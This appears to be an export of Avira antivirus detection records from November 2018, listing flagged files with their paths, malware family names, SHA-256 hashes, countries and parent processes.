  Row(detection=Row(filename='avscan-20181104-205442-1dc67ed3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205442-1DC67ED3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:54:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173019-98c9d01b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10135bc4\\AVSCAN-20181104-172847-8E9DA678\\AVSCAN-20181104-173019-98C9D01B', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:30:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:42:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082244-49cdb9ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6d46ad8\\AVSCAN-20181104-082225-4720EC21\\AVSCAN-20181104-082244-49CDB9BA', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vboxservice.exe', filepath='D:\\KOPLAYER\\vbox\\additions\\VBoxService.exe', filesize=1472000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='d20bb8cd65757da09f40bb949e2a9101055df07706db25971581108b476a16a6', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\regsvr.exe', parentsize=1136128, timestamp='2018-11-04T06:37:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003411.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003411.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='d77957c17cff095d8a758f327b5353545b617c02aa739ec0355431c3a64deede', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c5b', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c5b', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4675105ff1283db6e639a8e6694f20ae5683701c228aee5ad9e4a1f05c2759c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:04:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T15:44:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180117-e7aff50e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d4c3524\\AVSCAN-20181104-175811-D1085C03\\AVSCAN-20181104-180117-E7AFF50E', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:01:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193645-9b913d39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c05ae1e7\\AVSCAN-20181104-193621-966D019E\\AVSCAN-20181104-193645-9B913D39', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1a54c7cfacec51ef13741b2bc01af7bd7edd66edf1e7386ec30c4c9cd48feca9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bleach_ cap 346-366.exe', filepath='F:\\Bleach_ Cap 346-366.exe', filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='a575da9d2ef9a3242803a58c22e090d66a06769f9853db5bd46eab5a6420c27f', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T15:21:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015dbbc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015dbbc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:45:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d58e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d58e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wjbqiiul.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WJbQIiUL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131707-58245db2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-131151-33810FE0\\AVSCAN-20181102-131707-58245DB2', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hotring furio night.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\hotring_furio_night\\HOTRING FURIO NIGHT\\HOTRING FURIO NIGHT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ce1fa5f4261acdae33a4cef7e6589fdda75ea01b63a6a7e8598dd4f1ebc5c45f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Documents\\Vuze Downloads\\Pixologic ZBrush 4R8 P2 + Crack (x64) - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-02T17:48:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v_mzo8.exe', filepath='\\\\?\\C:\\ProgramData\\DiscountExtensi\\V_MZo8.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105522-60cd444d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105522-60CD444D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143816-44399294', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c8b84931\\AVSCAN-20181102-143755-4193B0E8\\AVSCAN-20181102-143816-44399294', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsb9E0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/SkipUac', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8370448, timestamp='2018-11-02T15:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134515-d43ef710', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-123256-410908D6\\AVSCAN-20181102-134515-D43EF710', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Common Files\\mcafee\\AMCore\\mcshield.exe', parentsize=1017016, timestamp='2018-11-02T05:43:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:52:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='c1b78bfd47bc5243121046c97c0d4b9838fbe20d56860ae109a70af752d8e735', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T07:08:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uh.exe', filepath='c:\\users\\X\\appdata\\roaming\\uh.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b1327d09bbefaf94ecf7ac51cca1cf34da89e8fcaf878490e2e84796cd218854.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B1327D09BBEFAF94ECF7AC51CCA1CF34DA89E8FCAF878490E2E84796CD218854.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1327d09bbefaf94ecf7ac51cca1cf34da89e8fcaf878490e2e84796cd218854', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:47:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093755-d2a15f68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9672750\\AVSCAN-20181102-093706-CAEF292A\\AVSCAN-20181102-093755-D2A15F68', filesize=1280000, name='HEUR/APC.#M1.#R1'), hash='b994d386a49ab3f0c90d538aedfe1e328c75eeda024cec306fef1049ee10a608', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135801-5d227b1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_535b8b26\\AVSCAN-20181102-132126-77956AC9\\AVSCAN-20181102-135801-5D227B1C', filesize=128000, name='TR/AD.MoksSteal.B.#M1.#R1'), hash='da8af2c922f3eb12609cb5588a0d5bd5e0806f91f26efb356fcc8be4f1623c1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141933-17c8daa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b6ce7e4\\AVSCAN-20181102-141749-091C3FE4\\AVSCAN-20181102-141933-17C8DAA4', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-002028-580ba49f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73410774\\AVSCAN-20181102-001746-3BB643A7\\AVSCAN-20181102-002028-580BA49F', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-031013-4660a447', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d3016c4\\AVSCAN-20181102-005854-FC38E0AB\\AVSCAN-20181102-031013-4660A447', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:10:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090432-e3e84b1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdbb2d48\\AVSCAN-20181102-085645-A00F5F29\\AVSCAN-20181102-090432-E3E84B1C', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9e3d68102514cb64cce77a8645febc9ea6b04533ea84773741299666deb52220', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\TRITON SPORT -SU- MY 2018 - PWTE1709R\\TOOL\\VISTAMSV\\ENV\\VISTAMSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d5fec922e0056c35e3c98017c145337ba9a6b279f589b79a2a8c38abc76f69ad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cards.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cards\\cards.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T12:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1a7ca978edb4806c4fbbff56c81610e5', filepath='e:\\sample\\20181102_sample\\1A7CA978EDB4806C4FBBFF56C81610E5', filesize=512000, name='HEUR/AGEN.1007129.#M1.#R1'), hash='9eb5344f51f1694eabd602a08deb0899ff187d8319ffeb6807f194d8313cf206', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M+nenADk+0C2Z4e+.1', country='PY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T00:06:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE2D08.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013833-47e7a39e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d3016c4\\AVSCAN-20181102-005854-FC38E0AB\\AVSCAN-20181102-013833-47E7A39E', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133240-c485e7c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-132855-AA652CC5\\AVSCAN-20181102-133240-C485E7C6', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00297892', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297892', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:50:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='object', filepath='object', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='liveupdate360.exe', filepath='C:\\360SANDBOX\\SHADOW\\Program Files (x86)\\360\\Total Security\\LiveUpdate360.exe', filesize=872000, name='W32/Neshta.A.#M1.#R1'), hash='f2b94adda8ff7f24fa6d39b3a6bc358727486df23322bd45b0dbed6850130be0', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:36:22Z'), dt=datetime.date(2018, 11, 4)),
